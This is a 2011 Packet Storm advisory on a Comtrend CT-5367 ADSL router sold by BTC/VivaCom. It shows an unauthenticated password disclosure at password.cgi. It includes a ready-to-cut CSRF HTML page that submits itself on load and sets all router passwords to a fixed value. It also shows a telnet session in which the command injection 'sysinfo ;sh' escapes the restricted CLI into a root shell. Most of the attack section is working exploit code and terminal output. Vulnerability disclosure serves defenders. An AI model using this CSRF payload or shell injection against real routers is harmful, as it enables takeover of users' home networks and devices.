Comtrend ADSL Router BTC (VivaCom) Cross Site Request Forgery

2011-03-04T00:00:00
ID PACKETSTORM:98920
Type packetstorm
Reporter Todor Donev
Modified 2011-03-04T00:00:00

Description

                                        
                                            `/*COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root  
=============================================================================  
Board ID : 96338A-122  
Software : A111-312BTC-C01_R12  
Bootloader : 1.0.37-12.1-1  
Wireless Driver : 4.170.16.0.cpe2.1sd  
ADSL : A2pB023k.d20k_rc2  
  
=============================================================================  
Type : HardWare  
Risk of use : High  
Type to use : Remote  
Discovered by : Todor Donev  
Author Email : todor.donev@gmail.com  
  
=============================================================================  
Special greetz to my sweetheart friend and my lil' secret Tsvetelina Emirska,  
and all my other friends that support me a lot of times for everything !!  
  
*/  
  
root@linux:~# get.pl http://192.168.1.1/  
  
/*HTTP/1.1 401 Unauthorized  
Cache-Control: no-cache  
Connection: close  
Date: Sat, 01 Jan 2000 00:04:31 GMT  
Server: micro_httpd ## Yeah !! Bite me :(  
WWW-Authenticate: Basic realm="DSL Router"  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>  
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>  
Authorization required.  
<HR>  
<ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS>  
</BODY></HTML>  
*/  
  
root@linux:~# get.pl http://192.168.1.1/password.cgi ## Information Disclosure  
  
/*HTTP/1.1 200 Ok  
Cache-Control: no-cache  
Connection: close  
Date: Mon, 03 Jan 2000 23:01:25 GMT  
Server: micro_httpd  
Content-Type: text/html  
  
<html>  
<head>  
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>  
<link rel="stylesheet" href='stylemain.css' type='text/css'>  
<link rel="stylesheet" href='colors.css' type='text/css'>  
<script language="javascript" src="util.js"></script>  
<script language="javascript">  
<!-- hide\n ## Dammit! =))  
pwdAdmin = '<CENSORED>'; ## Censored Password  
pwdSupport = '<CENSORED>'; ## Censored Password  
pwdUser = '<CENSORED>';\n ## Censored Password  
*/  
  
  
  
[CUT EXPLOIT HERE] ## CSRF For Change All passwords  
<html>  
<head></head>  
<title>COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Change All passwords</title>  
<body onLoad=javascript:document.form.submit()>  
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">  
<!-- Change default system Passwords to "shpek" without authentication and verification -->  
<input type="hidden" name="sptPassword" value="shpek">  
<input type="hidden" name="usrPassword" value="shpek">  
<input type="hidden" name="sysPassword" value="shpek">  
</form>  
</body>  
</html>  
[CUT EXPLOIT HERE]  
  
  
root@linux:~# telnet 192.168.1.1  
  
ADSL Router Model CT-5367 Sw.Ver. C01_R12  
Login: root  
Password:  
## BINGOO !! Godlike =))  
> ?  
  
?  
help  
logout  
reboot  
adsl  
atm  
ddns  
dumpcfg  
ping  
siproxd  
sntp  
sysinfo  
tftp  
wlan  
version  
build  
ipfilter  
  
> sysinfo  
Number of processes: 30  
11:46pm up 2 days, 23:46,  
load average: 1 min:0.12, 5 min:0.05, 15 min:0.09  
total used free shared buffers  
Mem: 14012 13028 984 0 588  
Swap: 0 0 0  
Total: 14012 13028 984  
  
> sysinfo ;sh ## JAILBREAK !! FirmWare sucks :)  
Number of processes: 30  
11:47pm up 2 days, 23:47,  
load average: 1 min:0.07, 5 min:0.05, 15 min:0.08  
total used free shared buffers  
Mem: 14012 13024 988 0 588  
Swap: 0 0 0  
Total: 14012 13024 988  
  
  
BusyBox v1.00 (2009.12.08-09:42+0000) Built-in shell (msh)  
Enter 'help' for a list of built-in commands.  
  
# cat /proc/version  
Linux version 2.6.8.1 (wander@localhost.localdomain) (gcc version 3.4.2) #1 Tue Dec 8 17:40:39 CST 2009  
  
# ps  
PID Uid VmSize Stat Command  
1 root 280 S init  
2 root SWN [ksoftirqd/0]  
3 root SW< [events/0]  
4 root SW< [khelper]  
5 root SW< [kblockd/0]  
15 root SW [pdflush]  
16 root SW [pdflush]  
17 root SW [kswapd0]  
18 root SW< [aio/0]  
23 root SW [mtdblockd]  
32 root 328 S -sh  
65 root 1384 S cfm  
72 root SW [bcmsw]  
192 root 216 S pvc2684d  
275 root 496 S nas -P /var/wl0nas.lan0.pid -H 34954 -l br0 -i wl0 -A  
342 root 304 S dhcpd  
596 root 1384 S CT_Polling  
600 root 432 S pppd -c 0.0.35.1 -i nas_0_0_35 -u <CENSORED> -p  
931 root 248 S dhcpc -i nas_0_0_40  
993 root 316 S dproxy -D btc-adsl  
997 root 352 S upnp -L br0 -W ppp_0_0_35_1 -D  
1013 root 512 S siproxd --config /var/siproxd/siproxd.conf  
1014 root 512 S siproxd --config /var/siproxd/siproxd.conf  
1015 root 512 S siproxd --config /var/siproxd/siproxd.conf  
10745 root 292 S syslogd -C -l 7  
10747 root 256 S klogd  
6616 root 1396 S telnetd  
6618 root 1428 S telnetd  
6673 root 284 S sh -c sysinfo ;sh  
6724 root 284 R ps  
  
# top  
Mem: 13164K used, 848K free, 0K shrd, 588K buff, 5920K cached  
Load average: 0.00, 0.02, 0.07 (State: S=sleeping R=running, W=waiting)  
  
PID USER STATUS RSS PPID %CPU %MEM COMMAND  
6751 root R 288 6675 0.7 2.0 exe  
2 root SWN 0 1 0.3 0.0 ksoftirqd/0  
6616 root S 1396 65 0.1 9.9 telnetd  
931 root S 248 1 0.1 1.7 dhcpc  
6618 root S 1428 6616 0.0 10.1 telnetd  
65 root S 1384 32 0.0 9.8 cfm  
596 root S 1384 65 0.0 9.8 CT_Polling  
1013 root S 512 1 0.0 3.6 siproxd  
1014 root S 512 1013 0.0 3.6 siproxd  
1015 root S 512 1014 0.0 3.6 siproxd  
275 root S 496 1 0.0 3.5 nas  
600 root S 432 1 0.0 3.0 pppd  
997 root S 352 1 0.0 2.5 upnp  
32 root S 328 1 0.0 2.3 sh  
993 root S 316 1 0.0 2.2 dproxy  
6675 root S 316 6673 0.0 2.2 exe  
342 root S 304 1 0.0 2.1 dhcpd  
10745 root S 292 1 0.0 2.0 exe  
6673 root S 284 6618 0.0 2.0 sh  
1 root S 280 0 0.0 1.9 init  
# echo * ## ls o.O?!?   
bin dev etc lib linuxrc mnt proc sbin usr var webs  
#   
`